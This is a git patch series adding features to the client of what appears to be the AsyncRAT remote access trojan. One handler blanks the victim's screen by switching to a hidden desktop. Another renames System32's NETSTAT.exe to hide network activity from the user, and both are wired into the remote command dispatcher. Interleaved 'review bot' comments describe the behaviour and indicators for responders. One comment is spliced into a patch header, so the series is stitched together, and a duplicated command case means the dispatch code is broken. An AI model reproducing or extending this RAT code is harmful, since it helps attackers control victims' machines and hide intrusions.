From 3acc737040df2fa3d2f53c9f7d892409080ec842 Mon Sep 17 00:00:00 2001
From: MrDevBot
Date: Mon, 17 Jun 2019 14:14:57 +1000
Subject: [PATCH 1/5] Created handle function and packets TODO: Submit merge request to master
---
 .../Client/Handle Packet/HandleBlankScreen.cs | 71 +++++++++++++++++++
 1 file changed, 71 insertions(+)
 create mode 100644 AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs b/AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs
new file mode 100644
index 0000000..919382e
--- /dev/null
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs
@@ -0,0 +1,71 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace Client.Handle_Packet
+{
+ class HandleBlankScreen
+ {
+ [DllImport("user32.dll")]
+ public static extern IntPtr CreateDesktop(string lpszDesktop, IntPtr lpszDevice, IntPtr pDevmode, int dwFlags, uint dwDesiredAccess, IntPtr lpsa);
+
+ [DllImport("user32.dll")]
+ private static extern bool SwitchDesktop(IntPtr hDesktop);
+
+ [DllImport("user32.dll")]
+ public static extern bool CloseDesktop(IntPtr handle);
+
+ [DllImport("user32.dll")]
+ public static extern bool SetThreadDesktop(IntPtr hDesktop);
+
+ [DllImport("user32.dll")]
+ public static extern IntPtr GetThreadDesktop(int dwThreadId);
+
+ [DllImport("kernel32.dll")]
+ public static extern int GetCurrentThreadId();
+ enum DESKTOP_ACCESS : uint
+ {
+ DESKTOP_NONE = 0,
+ DESKTOP_READOBJECTS = 0x0001,
+ DESKTOP_CREATEWINDOW = 0x0002,
+ DESKTOP_CREATEMENU = 0x0004,
+ DESKTOP_HOOKCONTROL = 0x0008,
+ DESKTOP_JOURNALRECORD = 0x0010,
+ DESKTOP_JOURNALPLAYBACK = 0x0020,
+ DESKTOP_ENUMERATE = 0x0040,
+ DESKTOP_WRITEOBJECTS = 0x0080,
+ DESKTOP_SWITCHDESKTOP = 0x0100,
+
+ GENERIC_ALL = (DESKTOP_READOBJECTS | DESKTOP_CREATEWINDOW | DESKTOP_CREATEMENU |
+ DESKTOP_HOOKCONTROL | DESKTOP_JOURNALRECORD | DESKTOP_JOURNALPLAYBACK |
+ DESKTOP_ENUMERATE | DESKTOP_WRITEOBJECTS | DESKTOP_SWITCHDESKTOP),
+ }
+
+ // old desktop's handle, obtained by getting the current desktop assigned for this thread
+ static readonly IntPtr hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
+
+ // new desktop's handle, assigned automatically by CreateDesktop
+ static IntPtr hNewDesktop = CreateDesktop("RandomDesktopName", IntPtr.Zero, IntPtr.Zero, 0, (uint)DESKTOP_ACCESS.GENERIC_ALL, IntPtr.Zero);
+
+ public static bool switcher = false; //the screen is not blanked be default so this should be false
+ public static void RunBlankScreen()
+ {
+ //light switch logic CopyPasta by MrDevBot
+
+ if (switcher == false) //The current screen is NOT blanked and needs to be
+ {
+ SwitchDesktop(hNewDesktop);
+ switcher = true; //sets the switch to on for next click
+ return; //returns to calling function
+ }
+ else //the screen is blanked and should be switched back to old
+ {
+ SwitchDesktop(hOldDesktop);
+ switcher = false; //sets the switch to off for next click
+ return; //returns to calling function
+ }
+ }
+ }
+}
From 321601a704dcbbc280a0b5ea56510c82c4ae8f00 Mon Sep 17 00:00:00 2001
From: MrDevBot
Date: Mon, 17 Jun 2019 14:16:33 +1000
Subject: [PATCH 2/5] Added call handler to packets.cs
---
 AsyncRAT-C#/Client/Handle Packet/Packet.cs | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
index f16ffb2..e570128 100644
--- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
@@ -297,6 +297,11 @@ namespace Client.Handle_Packet
 new HandlerExecuteDotNetCode(unpack_msgpack);
 break;
 }
+ case "blankscreen":
+ {
+ new HandleBlankScreen();
+ break;
+ }
 }
 }
 catch (Exception ex)
From fd4d1e4ff0546d1ae6c6c62bf94cf6ef7bf2058b Mon Sep 17 00:00:00 2001
From: MrDevBot
Date: Mon, 17 Jun 2019 14:17:06 +1000
Subject: [PATCH 3/5] Fixed formating
---
 AsyncRAT-C#/Client/Handle Packet/Packet.cs | 1 +
 1 file changed, 1 insertion(+)
diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
index e570128..1879d6e 100644
--- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
@@ -297,6 +297,7 @@ namespace Client.Handle_Packet
 new HandlerExecuteDotNetCode(unpack_msgpack);
 break;
 }
+
 case "blankscreen":
 {
 new HandleBlankScreen();
From 5dc5eb697df3638cf1d34d9b2de5c014fd6662fd Mon Sep 17 00:00:00 2001
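Review bot: HandleBlankScreen.cs (patch 1/5) has no comment saying what the class does to the host: the static initializer for `hNewDesktop` calls `CreateDesktop("RandomDesktopName", …)` with all nine desktop rights from the enum (0x01FF), and `RunBlankScreen` alternates `SwitchDesktop` between that new desktop and the thread's original one, which by the file's own comments blanks the screen. A class header should state this, for example `// Toggles the visible desktop between the user's own and a second one named "RandomDesktopName"; dispatched from the "blankscreen" case in Packet.cs.` The enum member `GENERIC_ALL` is also misnamed, because it is the OR of the DESKTOP_* rights listed above it rather than the Win32 generic access right, so a reader matching access masks should use the computed value. For triage, the fixed desktop name and the CreateDesktop/SwitchDesktop import pair are the stable artifacts of this revision.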
From: MrDevBot
Date: Mon, 17 Jun 2019 14:47:39 +1000
Subject: [PATCH 4/5] Created HandleNetStat Function
---
 .../Client/Handle Packet/HandleNetStat | 39 +++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 AsyncRAT-C#/Client/Handle Packet/HandleNetStat
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleNetStat b/AsyncRAT-C#/Client/Handle Packet/HandleNetStat
new file mode 100644
index 0000000..1bff2b8
--- /dev/null
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleNetStat
@@ -0,0 +1,39 @@
+using Client.Helper;
+using System;
+
+namespace Client.Handle_Packet
+{
+ class HandleNetStat
+ {
+ static bool switcher = false;
+ public static void RunNetStat()
+ {
+ //light switch logic CopyPasta by MrDevBot
+ if (!Methods.IsAdmin()) return; //if we are not admin return
+
+ if (switcher == false) //The current screen is NOT blanked and needs to be
+ {
+ try
+ {
+ System.IO.File.Move("C:\\Windows\\System32\\NETSTAT.exe", "C:\\Windows\\System32\\NETSTAT.Backup.txt");
+ }
+ catch(Exception ex) //probably AntiTamper protection or Admin Privilages
+ { }
+
+ switcher = true; //sets the switch to on for next click
+ return; //returns to calling function
+ }
+ else //the screen is blanked and should be switched back to old
+ {
+ try
+ {
+ System.IO.File.Move("C:\\Windows\\System32\\NETSTAT.Backup.txt", "C:\\Windows\\System32\\NETSTAT.EXE");
+ }
+ catch (Exception ex) //probably AntiTamper protection or Admin Privilages
+ { }
+ switcher = false; //sets the switch to off for next click
+ return; //returns to calling function
+ }
+ }
+ }
+}
From 68896b53e94c169bedbf7400707f37539e4b2c07 Mon Sep 17 00:00:00 2001
From: MrDevBot
Date: Mon, 17 Jun 2019 14:48:35 +1000
Subject: [PATCH 5/5] Added Call NetStatHandler
---
 AsyncRAT-C#/Client/Handle Packet/Packet.cs | 6 ++++++
 1 file changed, 6 insertions(+)
diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
index 1879d6e..ae4a4eb 100644
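Review bot: The branch comments in `RunNetStat` (HandleNetStat, patch 4/5) were copied from the blank-screen handler and talk about a screen being blanked, while the code renames `C:\Windows\System32\NETSTAT.exe` to `NETSTAT.Backup.txt` and back once `Methods.IsAdmin()` passes. They should describe the rename, with a header such as `// Moves NETSTAT.exe aside to NETSTAT.Backup.txt, or restores it; elevated only, all errors swallowed.` Both `catch` blocks are empty and `switcher` flips whether or not the move succeeded, so the flag does not tell a responder which state the host is in; the two paths on disk do. A rename of a System32 binary by a process that is not a servicing component, or the presence of `NETSTAT.Backup.txt` in that directory, is the host-side indicator, and restoring the original name or repairing the file from a trusted source undoes it.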
--- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
@@ -303,6 +303,12 @@ namespace Client.Handle_Packet
 new HandleBlankScreen();
 break;
 }
+
+ case "blankscreen":
+ {
+ new HandleNetStat();
+ break;
+ }
 }
 }
 catch (Exception ex)
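Review bot: The label added here is a second `case "blankscreen":`, the same string patch 2/5 introduced for `HandleBlankScreen`, and both cases only construct the handler class while the behaviour in patches 1/5 and 4/5 lives in the static `RunBlankScreen` and `RunNetStat` methods; no call to either is visible in this series. The file in patch 4/5 is also added without a `.cs` extension, so whether it is built at all cannot be told from here. Anyone writing detections or a capability summary from this revision should not assume a distinct command string or a working dispatch path for the NETSTAT rename, and should key on the host-side effects of the handlers instead. The enclosing switch starts and ends outside the hunk.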